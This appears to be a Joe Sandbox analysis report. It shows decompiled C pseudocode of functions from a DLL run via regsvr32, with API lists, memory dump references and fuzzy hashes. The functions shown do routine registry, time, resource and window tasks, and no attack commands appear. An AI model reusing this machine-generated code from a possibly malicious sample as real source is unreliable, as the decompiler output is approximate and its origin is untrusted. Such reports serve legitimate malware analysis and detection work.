                                                                        				_v16 = 0;
                                                                        				_t35 = 0x1004b390;
                                                                        				if(_t46 == 0) {
                                                                        					L13:
                                                                        					RegCloseKey(0);
                                                                        					return 1;
                                                                        				}
                                                                        				do {
                                                                        					if(RegOpenKeyExA(0x80000001,  *_t35, 0, 1,  &_v8) != 0) {
                                                                        						goto L11;
                                                                        					}
                                                                        					_t8 =  &(_t35[1]); // 0x1004b358
                                                                        					_t44 =  *_t8;
                                                                        					while(1) {
                                                                        						_t32 =  *_t44;
                                                                        						if(_t32 == 0) {
                                                                        							goto L11;
                                                                        						}
                                                                        						if(RegQueryValueExA(_v8, _t32, 0,  &_v16,  &_v12,  &_v24) == 0 && _v16 == 4) {
                                                                        							_t34 = _v20;
                                                                        							_t16 =  &(_t44[1]); // 0x1
                                                                        							_t40 =  *_t16;
                                                                        							if(_v12 == 0) {
                                                                        								 *(_t34 + 0x9c) =  *(_t34 + 0x9c) &  !_t40;
                                                                        							} else {
                                                                        								 *(_t34 + 0x9c) =  *(_t34 + 0x9c) | _t40;
                                                                        							}
                                                                        						}
                                                                        						_v12 = 0;
                                                                        						_v24 = 4;
                                                                        						_v16 = 0;
                                                                        						_t44 =  &(_t44[2]);
                                                                        					}
                                                                        					L11:
                                                                        					RegCloseKey(_v8);
                                                                        					_t35 =  &(_t35[2]);
                                                                        					_v8 = 0;
                                                                        				} while ( *_t35 != 0);
                                                                        				goto L13;
                                                                        			}















                                                                        APIs
                                                                        • RegOpenKeyExA.ADVAPI32(80000001,1004B390,00000000,00000001,?), ref: 10034B78
                                                                        • RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,?,00000004), ref: 10034B98
                                                                        • RegCloseKey.ADVAPI32(?), ref: 10034BDC
                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 10034BF2
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.441047171.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000002.00000002.441039881.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441089778.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441102742.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441272413.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441818626.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                        Similarity
                                                                        • API ID: Close$OpenQueryValue
                                                                        • String ID:
                                                                        • API String ID: 1607946009-0
                                                                        • Opcode ID: 9a8edc8e7e8c630006c35e1cb287b5a1c5b92324269ffeb4073756e8a178cadc
                                                                        • Instruction ID: c59a5bb59059241ef396f1e8f67c70b524d6e5c214a839477bb571e1d0f0587e
                                                                        • Opcode Fuzzy Hash: 9a8edc8e7e8c630006c35e1cb287b5a1c5b92324269ffeb4073756e8a178cadc
                                                                        • Instruction Fuzzy Hash: 86212CB5D00259EFDB06CF96C985EAEFBF8EF80355F1240AAE405AA151D770AA00CF21
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 89%
                                                                        			E10026A96(void* __ecx, void* __edx, intOrPtr _a4, struct _FILETIME* _a8) {
                                                                        				struct _FILETIME _v12;
                                                                        				struct _SYSTEMTIME _v28;
                                                                        				char _v44;
                                                                        				void* __ebp;
                                                                        				int _t23;
                                                                        				int _t26;
                                                                        				int _t29;
                                                                        				int _t31;
                                                                        				void* _t40;
                                                                        				void* _t56;
                                                                        				void* _t59;
                                                                        
                                                                        				_t47 = __edx;
                                                                        				_t40 = __ecx;
                                                                        				_t56 = _t59;
                                                                        				if(_a8 != 0) {
                                                                        					_t52 = _a4;
                                                                        					_v28.wYear = E10010297(__eflags);
                                                                        					_v28.wMonth = E100102AE(__eflags);
                                                                        					_t23 = E100134E7(_a4, __edx, _a4);
                                                                        					__eflags = _t23;
                                                                        					if(__eflags == 0) {
                                                                        						_v28.wDay = 0;
                                                                        					} else {
                                                                        						_v28.wDay =  *((intOrPtr*)(_t23 + 0xc));
                                                                        					}
                                                                        					_v28.wHour = E100102C1(__eflags);
                                                                        					_v28.wMinute = E100102D4(__eflags);
                                                                        					_t26 = E100134E7(_t52, _t47, _t52);
                                                                        					__eflags = _t26;
                                                                        					if(_t26 == 0) {
                                                                        						_t14 =  &(_v28.wSecond);
                                                                        						 *_t14 = _v28.wSecond | 0x0000ffff;
                                                                        						__eflags =  *_t14;
                                                                        					} else {
                                                                        						_v28.wSecond =  *_t26;
                                                                        					}
                                                                        					_v28.wMilliseconds = 0;
                                                                        					_t29 = SystemTimeToFileTime( &_v28,  &_v12);
                                                                        					__eflags = _t29;
                                                                        					if(_t29 == 0) {
                                                                        						E100271C6(_t56, GetLastError(), 0);
                                                                        					}
                                                                        					_t31 = LocalFileTimeToFileTime( &_v12, _a8);
                                                                        					__eflags = _t31;
                                                                        					if(_t31 == 0) {
                                                                        						_t31 = E100271C6(_t56, GetLastError(), 0);
                                                                        					}
                                                                        					return _t31;
                                                                        				} else {
                                                                        					_push(_t56);
                                                                        					_push(__ecx);
                                                                        					_v44 = 0x1004d548;
                                                                        					E10011C0F( &_v44, 0x10045e48);
                                                                        					asm("int3");
                                                                        					return  *((intOrPtr*)(_t40 + 0x70));
                                                                        				}
                                                                        			}















                                                                        APIs
                                                                        • SystemTimeToFileTime.KERNEL32(?,?), ref: 10026B18
                                                                        • GetLastError.KERNEL32(00000000), ref: 10026B29
                                                                        • LocalFileTimeToFileTime.KERNEL32(?,0000FFFF), ref: 10026B38
                                                                        • GetLastError.KERNEL32(00000000), ref: 10026B43
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.441047171.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000002.00000002.441039881.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441089778.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441102742.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441272413.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441818626.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                        Similarity
                                                                        • API ID: Time$File$ErrorLast$LocalSystem
                                                                        • String ID:
                                                                        • API String ID: 1172841412-0
                                                                        • Opcode ID: 5dc5c312d13e401fcfbadd669c1a0a16765e23d0604991783c5979921889d443
                                                                        • Instruction ID: f1a830ef30183d99209262c84c87e780bb224e30df7a02b89f1332faec0a7339
                                                                        • Opcode Fuzzy Hash: 5dc5c312d13e401fcfbadd669c1a0a16765e23d0604991783c5979921889d443
                                                                        • Instruction Fuzzy Hash: 4C11B929A1021DAACF01EBE59C458AF7B7CEF44750B41405BF805E7211EB74D681CB9A
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 37%
                                                                        			E1000D0B9(signed int _a4, signed int* _a8, intOrPtr _a12) {
                                                                        				void* _t14;
                                                                        				signed int _t16;
                                                                        				signed int _t17;
                                                                        				signed int _t18;
                                                                        				signed int _t20;
                                                                        				signed int _t23;
                                                                        				signed int* _t31;
                                                                        
                                                                        				_t31 = _a8;
                                                                        				if(_t31 == 0) {
                                                                        					return _t14;
                                                                        				}
                                                                        				_t23 = _a4;
                                                                        				if((_t23 & 0x00000020) == 0) {
                                                                        					_t16 = (_t23 & 0x0000ffff) - 8;
                                                                        					__eflags = _t16;
                                                                        					if(_t16 == 0) {
                                                                        						__imp__#6( *_t31);
                                                                        						L16:
                                                                        						 *_t31 =  *_t31 & 0x00000000;
                                                                        						L17:
                                                                        						if((_t23 & 0x00000010) != 0 &&  !(_t23 & 0x00004000) != 0) {
                                                                        							__imp__CoTaskMemFree(_t31[1]);
                                                                        						}
                                                                        						return _t16;
                                                                        					}
                                                                        					_t17 = _t16 - 1;
                                                                        					__eflags = _t17;
                                                                        					if(_t17 == 0) {
                                                                        						L13:
                                                                        						_t16 =  *_t31;
                                                                        						__eflags = _t16;
                                                                        						if(_t16 == 0) {
                                                                        							goto L17;
                                                                        						}
                                                                        						_t16 =  *((intOrPtr*)( *_t16 + 8))(_t16);
                                                                        						goto L16;
                                                                        					}
                                                                        					_t16 = _t17 - 3;
                                                                        					__eflags = _t16;
                                                                        					if(_t16 == 0) {
                                                                        						__imp__#9(_t31);
                                                                        						goto L17;
                                                                        					}
                                                                        					_t18 = _t16 - 1;
                                                                        					__eflags = _t18;
                                                                        					if(_t18 == 0) {
                                                                        						goto L13;
                                                                        					}
                                                                        					_t16 = _t18 - 0x7b;
                                                                        					__eflags = _t16;
                                                                        					if(__eflags == 0) {
                                                                        						E1000D03C( &_a8, __eflags, _a12);
                                                                        						_t20 = _a8;
                                                                        						__eflags = _t20;
                                                                        						if(_t20 != 0) {
                                                                        							 *((intOrPtr*)( *_t20 + 0x10))(_t20,  *_t31, 0);
                                                                        						}
                                                                        						_t16 = L1000C8E6( &_a8);
                                                                        					}
                                                                        					goto L17;
                                                                        				}
                                                                        				_t16 =  *_t31;
                                                                        				if(_t16 == 0) {
                                                                        					goto L17;
                                                                        				}
                                                                        				__imp__#16(_t16);
                                                                        				goto L16;
                                                                        			}











                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.441047171.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000002.00000002.441039881.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441089778.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441102742.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441272413.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441818626.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                        Similarity
                                                                        • API ID: ArrayDestroyFreeSafeTask
                                                                        • String ID:
                                                                        • API String ID: 3253174383-0
                                                                        • Opcode ID: e8ad03aeafd3d0ea856f226044b8eb18344ba6786890ac13f09cc67cb798247f
                                                                        • Instruction ID: d5df2e689e9d8d1315e3bdacc16dfbb058a5afc5faf3f73fb235713c606ee203
                                                                        • Opcode Fuzzy Hash: e8ad03aeafd3d0ea856f226044b8eb18344ba6786890ac13f09cc67cb798247f
                                                                        • Instruction Fuzzy Hash: E711563010020ABBFB55EF66DC84BEE77A8EF457D0F10441AFA858A198CF35EA00CB60
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 86%
                                                                        			E100306DB(void* __ecx, intOrPtr _a4, intOrPtr _a8) {
                                                                        				int _v8;
                                                                        				int _t21;
                                                                        				intOrPtr _t35;
                                                                        				int _t39;
                                                                        				void* _t49;
                                                                        
                                                                        				_push(__ecx);
                                                                        				_push(__ecx);
                                                                        				_t49 = __ecx;
                                                                        				_t39 = _a4 -  *((intOrPtr*)(__ecx + 4));
                                                                        				_t21 = _a8 -  *((intOrPtr*)(__ecx + 8));
                                                                        				_v8 = _t21;
                                                                        				OffsetRect(__ecx + 0x28, _t39, _t21);
                                                                        				OffsetRect(_t49 + 0x48, _t39, _v8);
                                                                        				OffsetRect(_t49 + 0x38, _t39, _v8);
                                                                        				OffsetRect(_t49 + 0x58, _t39, _v8);
                                                                        				_t51 =  *((intOrPtr*)(_t49 + 0x80));
                                                                        				 *((intOrPtr*)(_t49 + 4)) = _a4;
                                                                        				 *((intOrPtr*)(_t49 + 8)) = _a8;
                                                                        				if( *((intOrPtr*)(_t49 + 0x80)) == 0) {
                                                                        					_t35 = E100301DC();
                                                                        				} else {
                                                                        					_t35 = 0;
                                                                        				}
                                                                        				 *((intOrPtr*)(_t49 + 0x74)) = _t35;
                                                                        				return E10030582(_t49, _t51, 0);
                                                                        			}









                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.441047171.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000002.00000002.441039881.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441089778.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441102742.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441272413.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441818626.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                        Similarity
                                                                        • API ID: OffsetRect
                                                                        • String ID:
                                                                        • API String ID: 177026234-0
                                                                        • Opcode ID: beee98248f834fb6aab91ac6ff05766e8fc6b9e8229c4719242bff28fb5fbeb9
                                                                        • Instruction ID: 422a5061f760cbc8c05fd093b4a9fb31e1b7e654ec4c61e66631bb08b1bca8e5
                                                                        • Opcode Fuzzy Hash: beee98248f834fb6aab91ac6ff05766e8fc6b9e8229c4719242bff28fb5fbeb9
                                                                        • Instruction Fuzzy Hash: 3D110CB6600608BFD711DFEDC994DABB7ECEF48210F00882AF54AD7610E670FA408B60
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 94%
                                                                        			E1001EFFC(void* __ecx) {
                                                                        				void* _v8;
                                                                        				signed short _t23;
                                                                        				void* _t30;
                                                                        				struct HINSTANCE__* _t32;
                                                                        				signed short _t34;
                                                                        				void* _t36;
                                                                        				signed short* _t39;
                                                                        				signed short _t41;
                                                                        
                                                                        				_push(__ecx);
                                                                        				_t36 = __ecx;
                                                                        				_t39 =  *(__ecx + 0x5c);
                                                                        				_v8 =  *((intOrPtr*)(__ecx + 0x58));
                                                                        				if( *((intOrPtr*)(__ecx + 0x54)) != 0) {
                                                                        					_t32 =  *(E100373B5() + 0xc);
                                                                        					_v8 = LoadResource(_t32, FindResourceA(_t32,  *(_t36 + 0x54), 5));
                                                                        				}
                                                                        				if(_v8 != 0) {
                                                                        					_t39 = LockResource(_v8);
                                                                        				}
                                                                        				_t30 = 1;
                                                                        				if(_t39 != 0) {
                                                                        					_t34 =  *_t39;
                                                                        					if(_t39[1] != 0xffff) {
                                                                        						_t23 = _t39[5];
                                                                        						_t41 = _t39[6];
                                                                        					} else {
                                                                        						_t34 = _t39[6];
                                                                        						_t23 = _t39[9];
                                                                        						_t41 = _t39[0xa];
                                                                        					}
                                                                        					if((_t34 & 0x00001801) != 0 || _t23 != 0 || _t41 != 0) {
                                                                        						_t30 = 0;
                                                                        					}
                                                                        				}
                                                                        				if( *(_t36 + 0x54) != 0) {
                                                                        					FreeResource(_v8);
                                                                        				}
                                                                        				return _t30;
                                                                        			}












                                                                        APIs
                                                                        • FindResourceA.KERNEL32(?,00000000,00000005), ref: 1001F022
                                                                        • LoadResource.KERNEL32(?,00000000), ref: 1001F02A
                                                                        • LockResource.KERNEL32(00000000), ref: 1001F03C
                                                                        • FreeResource.KERNEL32(00000000), ref: 1001F086
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.441047171.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000002.00000002.441039881.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441089778.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441102742.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441272413.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441818626.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                        Similarity
                                                                        • API ID: Resource$FindFreeLoadLock
                                                                        • String ID:
                                                                        • API String ID: 1078018258-0
                                                                        • Opcode ID: 64b13492dfaf21cbbf07bee8131a48b852f4c6a235dda3ed0121460069c880f2
                                                                        • Instruction ID: f62bb37731aceb1cfac18bd5f8f11ebe971a113ae325be4be6212f910cba7098
                                                                        • Opcode Fuzzy Hash: 64b13492dfaf21cbbf07bee8131a48b852f4c6a235dda3ed0121460069c880f2
                                                                        • Instruction Fuzzy Hash: 8711E73A500715EFD722EFA1C988AABB7B4FF18794F00815CE8429B652D770EC84CB60
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 86%
                                                                        			E100257A8(void* __ecx, void* __esi) {
                                                                        				void* _v8;
                                                                        				void* __ebp;
                                                                        				void* _t9;
                                                                        				void* _t11;
                                                                        				void* _t23;
                                                                        				intOrPtr* _t30;
                                                                        				void* _t32;
                                                                        				void* _t35;
                                                                        
                                                                        				_t32 = __esi;
                                                                        				_push(__ecx);
                                                                        				_t23 = __ecx;
                                                                        				_t9 = E1001F77E(0x10);
                                                                        				_t36 = _t9;
                                                                        				if(_t9 == 0) {
                                                                        					_t30 = 0;
                                                                        					__eflags = 0;
                                                                        				} else {
                                                                        					_t30 = E10025742(_t9, _t36, 0xffffffff);
                                                                        				}
                                                                        				_push(_t32);
                                                                        				_t11 = GetCurrentProcess();
                                                                        				if(DuplicateHandle(GetCurrentProcess(),  *(_t23 + 4), _t11,  &_v8, 0, 0, 2) == 0) {
                                                                        					if(_t30 != 0) {
                                                                        						 *((intOrPtr*)( *_t30 + 4))(1);
                                                                        					}
                                                                        					E100271C6(_t35, GetLastError(),  *((intOrPtr*)(_t23 + 0xc)));
                                                                        				}
                                                                        				 *((intOrPtr*)(_t30 + 4)) = _v8;
                                                                        				 *((intOrPtr*)(_t30 + 8)) =  *((intOrPtr*)(_t23 + 8));
                                                                        				return _t30;
                                                                        			}












                                                                        APIs
                                                                        • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000002), ref: 100257DC
                                                                        • GetCurrentProcess.KERNEL32(?,00000000), ref: 100257E2
                                                                        • DuplicateHandle.KERNEL32(00000000), ref: 100257E5
                                                                        • GetLastError.KERNEL32(?), ref: 10025800
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.441047171.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000002.00000002.441039881.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441089778.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441102742.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441272413.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441818626.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                        Similarity
                                                                        • API ID: CurrentProcess$DuplicateErrorHandleLast
                                                                        • String ID:
                                                                        • API String ID: 3907606552-0
                                                                        • Opcode ID: 11538b09ad9ddda7391d08133ea87a958c9f6af064afdfc5abc666ebaf632c0d
                                                                        • Instruction ID: ac2035d42823edd271a7cb90e834c31b18cb545283139df8f74de7ed2b30b58d
                                                                        • Opcode Fuzzy Hash: 11538b09ad9ddda7391d08133ea87a958c9f6af064afdfc5abc666ebaf632c0d
                                                                        • Instruction Fuzzy Hash: 9A01D435740204AFEB01DBA9EC89F5A7BA8EF84761F104515F905CF182EB71EC0097A0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 94%
                                                                        			E1001D8A6(void* __ecx, struct tagPOINT* _a8) {
                                                                        				struct tagPOINT _v12;
                                                                        				struct tagPOINT* _t8;
                                                                        				struct HWND__* _t9;
                                                                        				int _t14;
                                                                        				long _t18;
                                                                        				struct HWND__* _t20;
                                                                        				struct HWND__* _t21;
                                                                        				struct HWND__* _t24;
                                                                        
                                                                        				_t8 = _a8;
                                                                        				_v12.x = _t8->x;
                                                                        				_t18 = _t8->y;
                                                                        				_push(_t18);
                                                                        				_v12.y = _t18;
                                                                        				_t9 = WindowFromPoint( *_t8);
                                                                        				_t24 = _t9;
                                                                        				if(_t24 != 0) {
                                                                        					_t20 = GetParent(_t24);
                                                                        					if(_t20 == 0 || E10029A8E(_t20, 2) == 0) {
                                                                        						ScreenToClient(_t24,  &_v12);
                                                                        						_t21 = E10029C98(_t24, _v12.x, _v12.y);
                                                                        						if(_t21 == 0) {
                                                                        							L6:
                                                                        							_t9 = _t24;
                                                                        						} else {
                                                                        							_t14 = IsWindowEnabled(_t21);
                                                                        							_t9 = _t21;
                                                                        							if(_t14 != 0) {
                                                                        								goto L6;
                                                                        							}
                                                                        						}
                                                                        					} else {
                                                                        						_t9 = _t20;
                                                                        					}
                                                                        				}
                                                                        				return _t9;
                                                                        			}












                                                                        APIs
                                                                        • WindowFromPoint.USER32(?,?), ref: 1001D8BD
                                                                        • GetParent.USER32(00000000), ref: 1001D8CB
                                                                        • ScreenToClient.USER32 ref: 1001D8EC
                                                                        • IsWindowEnabled.USER32(00000000), ref: 1001D905
                                                                          • Part of subcall function 10029A8E: GetWindowLongA.USER32 ref: 10029AA7
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.441047171.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000002.00000002.441039881.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441089778.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441102742.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441272413.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441818626.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                        Similarity
                                                                        • API ID: Window$ClientEnabledFromLongParentPointScreen
                                                                        • String ID:
                                                                        • API String ID: 2204725058-0
                                                                        • Opcode ID: 203580147984b863afd1059a40c53a8fb6a82f7499a9f31233211a8b075018b0
                                                                        • Instruction ID: b169f4ebd7b1781a2425983f4991e3855304b76673034f1eafd2744fb62dc6a9
                                                                        • Opcode Fuzzy Hash: 203580147984b863afd1059a40c53a8fb6a82f7499a9f31233211a8b075018b0
                                                                        • Instruction Fuzzy Hash: D3014F3A600615BFDB12FB59CC44DAE7BB9EF89690B11416AF901DB211EB30DE40DB60
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 62%
                                                                        			E10022B16(struct HWND__* _a4, int _a8, int _a12, long _a16, intOrPtr _a20, intOrPtr _a24) {
                                                                        				void* __ebp;
                                                                        				struct HWND__* _t16;
                                                                        				void* _t20;
                                                                        				struct HWND__* _t23;
                                                                        
                                                                        				_t16 = GetTopWindow(_a4);
                                                                        				while(1) {
                                                                        					_t23 = _t16;
                                                                        					if(_t23 == 0) {
                                                                        						break;
                                                                        					}
                                                                        					if(_a24 == 0) {
                                                                        						SendMessageA(_t23, _a8, _a12, _a16);
                                                                        					} else {
                                                                        						_push(_t23);
                                                                        						_t20 = E10022115();
                                                                        						if(_t20 != 0) {
                                                                        							_push(_a16);
                                                                        							_push(_a12);
                                                                        							_push(_a8);
                                                                        							_push( *((intOrPtr*)(_t20 + 0x1c)));
                                                                        							_push(_t20);
                                                                        							E1002283F();
                                                                        						}
                                                                        					}
                                                                        					if(_a20 != 0 && GetTopWindow(_t23) != 0) {
                                                                        						E10022B16(_t23, _a8, _a12, _a16, _a20, _a24);
                                                                        					}
                                                                        					_t16 = GetWindow(_t23, 2);
                                                                        				}
                                                                        				return _t16;
                                                                        			}








                                                                        APIs
                                                                        • GetTopWindow.USER32(?), ref: 10022B24
                                                                        • GetTopWindow.USER32(00000000), ref: 10022B63
                                                                        • GetWindow.USER32(00000000,00000002), ref: 10022B81
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.441047171.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000002.00000002.441039881.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441089778.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441102742.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441272413.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441818626.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                        Similarity
                                                                        • API ID: Window
                                                                        • String ID:
                                                                        • API String ID: 2353593579-0
                                                                        • Opcode ID: f20903795edc35669258cf1f74e1e4e851f1226be1756a02d54bb3e882155ab8
                                                                        • Instruction ID: 59ebec99428bed81cbae9e399db4f0855efa5802a24bdab8832a78d2f0a6533d
                                                                        • Opcode Fuzzy Hash: f20903795edc35669258cf1f74e1e4e851f1226be1756a02d54bb3e882155ab8
                                                                        • Instruction Fuzzy Hash: FC01A93600151ABBDF13AFE1AC05EDF3B6AEF45391F814011FA1455062C736D971EBA1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 95%
                                                                        			E10022422(void* __ecx, struct HWND__* _a4, int _a8, intOrPtr _a12) {
                                                                        				void* __ebp;
                                                                        				struct HWND__* _t10;
                                                                        				void* _t13;
                                                                        				struct HWND__* _t15;
                                                                        				struct HWND__* _t16;
                                                                        				void* _t17;
                                                                        
                                                                        				_t13 = __ecx;
                                                                        				_t15 = GetDlgItem(_a4, _a8);
                                                                        				if(_t15 == 0) {
                                                                        					L6:
                                                                        					_t10 = GetTopWindow(_a4);
                                                                        					while(1) {
                                                                        						_t16 = _t10;
                                                                        						if(_t16 == 0) {
                                                                        							goto L10;
                                                                        						}
                                                                        						_t10 = E10022422(_t13, _t16, _a8, _a12);
                                                                        						if(_t10 == 0) {
                                                                        							_t10 = GetWindow(_t16, 2);
                                                                        							continue;
                                                                        						}
                                                                        						goto L10;
                                                                        					}
                                                                        				} else {
                                                                        					if(GetTopWindow(_t15) == 0) {
                                                                        						L3:
                                                                        						_push(_t15);
                                                                        						if(_a12 == 0) {
                                                                        							return E100220EE(_t17);
                                                                        						}
                                                                        						_t10 = E10022115();
                                                                        						if(_t10 == 0) {
                                                                        							goto L6;
                                                                        						}
                                                                        					} else {
                                                                        						_t10 = E10022422(_t13, _t15, _a8, _a12);
                                                                        						if(_t10 == 0) {
                                                                        							goto L3;
                                                                        						}
                                                                        					}
                                                                        				}
                                                                        				L10:
                                                                        				return _t10;
                                                                        			}










                                                                        APIs
                                                                        • GetDlgItem.USER32 ref: 1002242D
                                                                        • GetTopWindow.USER32(00000000), ref: 10022440
                                                                          • Part of subcall function 10022422: GetWindow.USER32(00000000,00000002), ref: 10022487
                                                                        • GetTopWindow.USER32(?), ref: 10022470
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.441047171.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000002.00000002.441039881.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441089778.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441102742.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441272413.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441818626.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                        Similarity
                                                                        • API ID: Window$Item
                                                                        • String ID:
                                                                        • API String ID: 369458955-0
                                                                        • Opcode ID: b9e1787de5e7a1ed3ad65300bc5edf47a0a497a9be77156916138b2de0f7076e
                                                                        • Instruction ID: cbb5f4ea75b5981124a7b3c1720515b8597a7f038d3602274fac482962cbe2a9
                                                                        • Opcode Fuzzy Hash: b9e1787de5e7a1ed3ad65300bc5edf47a0a497a9be77156916138b2de0f7076e
                                                                        • Instruction Fuzzy Hash: A701623650166BBBDB23BFE2BC00E9F3B99EF462E4F828121FD0499111D731D9629691
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E1002B47F(void* __ecx, void* __edi, void* __esi, CHAR* _a4, CHAR* _a8, char _a12) {
                                                                        				intOrPtr _v8;
                                                                        				char _v24;
                                                                        				intOrPtr _t15;
                                                                        				long _t22;
                                                                        				void* _t31;
                                                                        				void* _t32;
                                                                        
                                                                        				_t15 =  *0x1004c470; // 0x303bb91f
                                                                        				_t31 = __ecx;
                                                                        				_v8 = _t15;
